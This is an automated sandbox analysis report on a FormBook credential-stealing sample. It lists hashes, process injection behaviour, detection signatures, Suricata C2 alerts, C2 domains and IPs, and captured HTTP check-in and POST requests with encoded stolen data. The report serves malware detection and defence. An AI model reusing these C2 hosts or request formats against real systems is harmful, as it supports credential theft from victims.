Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fi#U015f.exe

Overview

General Information

Sample name:Fi#U015f.exe
renamed because original name is a hash value
Original sample name:Fi.exe
Analysis ID:1562311
MD5:dd2d2996ee3044ca1ca5f90c91f2f77c
SHA1:7954d4424a2f3d17885ce18022446a10698f2dd7
SHA256:3897d9c3007e31624b405c791f4d45293aa60523c310069b06c0ec39b923f80e
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Fi#U015f.exe (PID: 3208 cmdline: "C:\Users\user\Desktop\Fi#U015f.exe" MD5: DD2D2996EE3044CA1CA5F90C91F2F77C)
    • svchost.exe (PID: 2696 cmdline: "C:\Users\user\Desktop\Fi#U015f.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • hnmibsTvfR.exe (PID: 4148 cmdline: "C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • icsunattend.exe (PID: 2300 cmdline: "C:\Windows\SysWOW64\icsunattend.exe" MD5: 6D01FCE30EF8A2CA0D385593E90879E5)
          • hnmibsTvfR.exe (PID: 1992 cmdline: "C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2260 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.3303150675.0000000004120000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2552287327.0000000002BF0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2552706561.0000000003400000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2552000811.0000000002140000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.3303269624.0000000002A00000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.2140000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.2140000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Fi#U015f.exe", CommandLine: "C:\Users\user\Desktop\Fi#U015f.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Fi#U015f.exe", ParentImage: C:\Users\user\Desktop\Fi#U015f.exe, ParentProcessId: 3208, ParentProcessName: Fi#U015f.exe, ProcessCommandLine: "C:\Users\user\Desktop\Fi#U015f.exe", ProcessId: 2696, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Fi#U015f.exe", CommandLine: "C:\Users\user\Desktop\Fi#U015f.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Fi#U015f.exe", ParentImage: C:\Users\user\Desktop\Fi#U015f.exe, ParentProcessId: 3208, ParentProcessName: Fi#U015f.exe, ProcessCommandLine: "C:\Users\user\Desktop\Fi#U015f.exe", ProcessId: 2696, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-25T13:55:19.746529+010020507451Malware Command and Control Activity Detected192.168.2.549812172.104.82.7480TCP
                2024-11-25T13:55:39.996367+010020507451Malware Command and Control Activity Detected192.168.2.54986131.31.196.17780TCP
                2024-11-25T13:55:55.660933+010020507451Malware Command and Control Activity Detected192.168.2.54990013.248.169.4880TCP
                2024-11-25T13:56:10.385825+010020507451Malware Command and Control Activity Detected192.168.2.54993413.248.169.4880TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Fi#U015f.exeReversingLabs: Detection: 73%
                Source: Yara matchFile source: 2.2.svchost.exe.2140000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2140000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3303150675.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552287327.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552706561.0000000003400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552000811.0000000002140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3303269624.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3301917962.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3303084240.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Fi#U015f.exeJoe Sandbox ML: detected
                Source: Fi#U015f.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hnmibsTvfR.exe, 00000004.00000000.2476250910.000000000075E000.00000002.00000001.01000000.00000005.sdmp, hnmibsTvfR.exe, 00000007.00000000.2625552123.000000000075E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Fi#U015f.exe, 00000000.00000003.2080229559.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, Fi#U015f.exe, 00000000.00000003.2080827454.0000000003470000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460035466.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458092933.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552321823.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552321823.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2554333146.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3303600933.000000000461E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2552233652.0000000004120000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3303600933.0000000004480000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Fi#U015f.exe, 00000000.00000003.2080229559.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, Fi#U015f.exe, 00000000.00000003.2080827454.0000000003470000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2460035466.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458092933.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552321823.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552321823.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2554333146.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3303600933.000000000461E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000003.2552233652.0000000004120000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3303600933.0000000004480000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdbGCTL source: svchost.exe, 00000002.00000002.2552129774.0000000002619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552114339.0000000002600000.00000004.00000020.00020000.00000000.sdmp, hnmibsTvfR.exe, 00000004.00000002.3302819959.0000000000E68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdb source: svchost.exe, 00000002.00000002.2552129774.0000000002619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2552114339.0000000002600000.00000004.00000020.00020000.00000000.sdmp, hnmibsTvfR.exe, 00000004.00000002.3302819959.0000000000E68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: icsunattend.exe, 00000006.00000002.3304456237.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3302124025.0000000000696000.00000004.00000020.00020000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000000.2625798931.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2843915674.00000000338DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: icsunattend.exe, 00000006.00000002.3304456237.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, icsunattend.exe, 00000006.00000002.3302124025.0000000000696000.00000004.00000020.00020000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000000.2625798931.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2843915674.00000000338DC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E86CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E86CA9
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00E860DD
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00E863F9
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E8EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E8EB60
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E8F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E8F5FA
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E8F56F FindFirstFileW,FindClose,0_2_00E8F56F
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E91B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E91B2F
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E91C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E91C8A
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E91F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E91F94

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49861 -> 31.31.196.177:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49812 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49900 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49934 -> 13.248.169.48:80
                Source: DNS query: www.aktmarket.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E94EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00E94EB5
                Source: global trafficHTTP traffic detected: GET /2dyu/?RhqLA=IdOhgVq&Zvupu44p=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgk/nttef79vSlz7njgVLZEtWvcnUQ3+FUHCaATxq3UQzYQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.funnystory.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficHTTP traffic detected: GET /9ul0/?Zvupu44p=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeUAbCHLl0Y/2eq8XbxFkjwUJTy71Wn7hwUVQgvRbUyIDUA==&RhqLA=IdOhgVq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.nartex-uf.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficHTTP traffic detected: GET /4mbo/?RhqLA=IdOhgVq&Zvupu44p=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e8GQOUHjh0/XAeWf+xbcrSf/780Hk7JHgoJ90GAMQodVPQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficHTTP traffic detected: GET /5cnx/?Zvupu44p=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+EUlRRQZaMEAQAdSQfgWtonXK7S514myqW5G+fyl7DTuYQ==&RhqLA=IdOhgVq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.a1shop.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficDNS traffic detected: DNS query: www.funnystory.online
                Source: global trafficDNS traffic detected: DNS query: www.nartex-uf.online
                Source: global trafficDNS traffic detected: DNS query: www.aktmarket.xyz
                Source: global trafficDNS traffic detected: DNS query: www.a1shop.shop
                Source: global trafficDNS traffic detected: DNS query: www.cssa.auction
                Source: unknownHTTP traffic detected: POST /9ul0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Host: www.nartex-uf.onlineOrigin: http://www.nartex-uf.onlineReferer: http://www.nartex-uf.online/9ul0/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 209Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)Data Raw: 5a 76 75 70 75 34 34 70 3d 79 2b 4d 38 68 6c 52 67 59 6e 6c 63 79 36 4f 63 6a 6a 54 68 4e 46 66 53 4c 6a 2f 79 70 51 33 33 52 7a 68 65 4f 42 45 65 77 61 72 61 41 43 64 41 55 31 52 42 65 56 49 6b 56 5a 6a 65 73 4f 35 32 37 68 6b 4e 72 77 6a 7a 65 6c 68 72 6e 75 30 38 67 43 6b 4e 63 79 63 45 4b 53 47 66 31 4c 44 2f 41 35 55 43 5a 58 6b 47 31 53 6f 4a 4d 53 33 61 57 45 4f 47 73 6b 78 6f 76 61 56 71 59 44 74 33 57 42 44 77 6b 65 4c 48 35 6c 43 30 43 31 6b 66 67 41 33 43 77 2b 4f 50 72 47 47 45 70 54 4f 74 75 49 4d 67 6a 5a 38 6a 51 30 64 41 76 42 72 45 6a 5a 2b 6e 39 47 74 71 49 2f 55 34 75 75 56 4d 61 4f 64 70 6f 72 67 3d Data Ascii: Zvupu44p=y+M8hlRgYnlcy6OcjjThNFfSLj/ypQ33RzheOBEewaraACdAU1RBeVIkVZjesO527hkNrwjzelhrnu08gCkNcycEKSGf1LD/A5UCZXkG1SoJMS3aWEOGskxovaVqYDt3WBDwkeLH5lC0C1kfgA3Cw+OPrGGEpTOtuIMgjZ8jQ0dAvBrEjZ+n9GtqI/U4uuVMaOdporg=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:55:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 ad f0 c6 0f ee 6d b3 b3 32 e7 96 a1 77 0d db ee be 3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 3a b7 a8 75 26 8e 1b f4 f8 94 a6 e9 77 22 5e b8 a0 57 16 b6 7b 37 f8 38 59 5a f3 b9 e9 6c ff 40 86 61 a7 97 d0 2d 0a 92 b2 fe d8 7f 48 43 a8 01 b0 0d 1f 5d a1 ee bb 82 66 7c 00 16 3d 20 b8 84 75 b7 cb 6c 29 d3 f3 5c 8f 02 8c 78 2a ec 68 fa d5 ca 74 36 03 2c 8c 1d 07 cf e7 e6 9c 6b 5e 65 60 cc b0 4c 84 76 10 b8 6b 40 dd 8c 09 65 70 73 00 b7 0d 9b 20 a2 ac 1d a0 19 e5 e4 ed 92 8a 4c e9 d4 08 18 8f 35 68 d5 0e 26 c3 13 6b 71 3f b8 f6 dc 3b 10 dd ab 5b cb b7 ae ed 2c 4c 55 69 4c dc 8e 36 95 f2 83 b5 25 49 e7 b8 d7 96 6d 0e 22 99 be a2 12 cd 45 8f fd cd 35 b2 f8 ca 5d 9b a0 a5 63 d1 8f 04 7f 07 5f ae 16 ae 0b 83 7f 30 77 ef 9c 9d 82 5a de 90 1d b5 aa da 17 12 de 54 9c 76 81 6b 2c 9e a5 44 95 c0 e5 ad a4 db 23 65 4d a6 aa 6d 19 2f 1f 50 85 4f 44 d0 bf c6 26 70 a7 f9 5e 49 01 cb 56 cb 6a a4 af 9b 52 93 81 55 42 43
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:55:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 ad f0 c6 0f ee 6d b3 b3 32 e7 96 a1 77 0d db ee be 3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 3a b7 a8 75 26 8e 1b f4 f8 94 a6 e9 77 22 5e b8 a0 57 16 b6 7b 37 f8 38 59 5a f3 b9 e9 6c ff 40 86 61 a7 97 d0 2d 0a 92 b2 fe d8 7f 48 43 a8 01 b0 0d 1f 5d a1 ee bb 82 66 7c 00 16 3d 20 b8 84 75 b7 cb 6c 29 d3 f3 5c 8f 02 8c 78 2a ec 68 fa d5 ca 74 36 03 2c 